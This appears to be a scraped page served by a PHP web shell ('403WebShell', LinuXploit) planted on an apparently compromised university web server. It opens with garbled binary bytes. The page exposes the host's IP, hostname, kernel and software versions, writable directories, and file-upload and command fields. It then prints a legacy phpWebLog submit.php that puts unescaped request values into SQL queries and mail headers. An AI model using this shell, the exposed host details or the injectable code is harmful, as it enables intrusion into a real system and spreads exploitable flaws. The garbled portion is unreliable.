h(  ) ($6;EbBLkfu�_l� ''8;DUFKV3Dd#,?ANk&5G$/(5M\^�ms����Sb�,;R''6c2I�!\����kx�Ve�[i��Me�IYO7:nOL~�Kr�qrv�I:�BM�y��s}r��K����x)1�6@r*2�89ma��&��'ti������{~#������t)1�2<�0:^5�W.uFzQ/u}�v��vv�u��U37yDJeEJo(/�5Ds'1�:Jlu�iy�iy�hw�1;:S`^BMLOQQn,4�7C�8C�>Lfe�]k�[i�Zg��IW�LZ�EP;,.��Tc�q(0) G,/]/1����w�r��l&-t*3�<<�u��#����j&.u��J68\8?"#$%&'()*+,-./0 ! 
Notice: Undefined index: dl in /var/www/html/web/simple.mini.php on line 1
403WebShell
403Webshell
Server IP : 10.254.12.21  /  Your IP : 10.254.12.21
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
System : Linux arit.skru.ac.th 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/rlocal/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/html/rlocal/submit.php
<?
/*=========================================================================

=*=======================================================================*/

include("include/common.inc.php");

/* debug */
if (0) {
	F_debug($HTTP_POST_VARS);
}
if (empty($HTTP_POST_VARS) && 0) {
	$msg	= urlencode("Access denied!");
	F_logAccess("Access denied trying to submit.");
	header("Location:$G_URL/?msg=$msg");
	exit();
}

switch	($what) {
case "comment":
	if ($save=="on") {
		F_saveUser($Author,$AuthorEmail,$AuthorURL);
	}
	$sql	= "INSERT INTO T_Comments ";
	$sql	.= "(Rid,ParentRid,TopRid,Author,AuthorEmail,AuthorURL,Content,Host,Birthstamp) ";
	$sql	.= "VALUES (";
	$sql	.= "'" . F_getRid() . "',";
	$sql	.= "'" . $ParentRid . "',";
	$sql	.= "'" . $TopRid . "',";
	if ($anon=="on") {
		$Author	= "Anonymous";
		$sql	.= "'Anonymous',";
		$sql	.= "'',";
		$sql	.= "'',";
	} else {
		$sql	.= "'" . addslashes($Author) . "',";
		$sql	.= "'" . addslashes($AuthorEmail) . "',";
		$sql	.= "'" . addslashes($AuthorURL) . "',";
	}
	$sql	.= "'" . addslashes($Content) . "',";
	$sql	.= "'" . F_getIP() . "',";
	$sql	.= "now()";
	$sql	.= ")";
	$RET	= @mysql_query($sql,$db);
	if ($RET<1) {
		F_error("Unable to insert comment.");
	} else {
		if ($CONF["EmailComments"]>0) {
			F_mailThread($TopRid,$Author,$Content,$AuthorEmail);
		}
		header("Location:$G_URL/$where");
	}
break;
case "contact":
	$tmp	= urlencode(_MAILERROR);
	if (	!empty($Author) && 
		!empty($AuthorEmail) && 
		!empty($Subject) && 
		!empty($Message) && 
		!empty($MailTo) && 
		!empty($MailToEmail)) {
		$RET	= @mail($MailTo . " <" . rot13($MailToEmail) . ">",
			strip_tags(stripslashes($Subject)),
			strip_tags(stripslashes($Message)),
			"From: $Author <$AuthorEmail>\nReturn-Path: <$AuthorEmail>\nX-Mailer: phpWebLog $G_VER");
		if ($RET>0) {
			$tmp	= urlencode(_MAILSENT);
		} else {
			F_error(_MAILERROR);
		}
	}
	header("Location:$G_URL/stories.php?msg=$tmp");
break;
case "mailfriend":
	$tmp	= urlencode(_MAILSENT);
	if (!empty($Author) && 
		!empty($AuthorEmail) && 
		!empty($Story) && 
		!empty($MailTo) && 
		!empty($MailToEmail)) {
		F_mailFriend($Story,$MailTo,$MailToEmail,$Author,$AuthorEmail,$Message);
	}
	header("Location:$G_URL/stories.php?story=$Story&msg=$tmp");
break;
}

?>

Youez - 2016 - github.com/yon3zu
LinuXploit